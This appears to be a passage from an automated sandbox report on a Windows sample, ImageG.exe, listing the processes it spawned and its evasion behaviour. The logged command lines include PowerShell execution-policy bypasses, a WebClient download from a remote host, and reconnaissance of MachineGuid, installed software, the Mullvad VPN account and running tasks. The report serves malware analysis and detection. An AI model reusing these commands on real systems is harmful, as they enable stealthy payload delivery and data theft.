        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032Thread sleep count: 7050 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9536Thread sleep count: 8860 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9876Thread sleep count: 995 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9908Thread sleep count: 9350 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9908Thread sleep count: 489 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9748Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9860Thread sleep count: 9545 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9860Thread sleep count: 265 > 30
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\ImageG.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwvJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\resourcesJump to behavior
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F5333B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hgFSo
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hGfSo
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HGfSo
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_5600.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 4416, type: MEMORYSTR
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=7896 get ExecutablePath"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"Jump to behavior
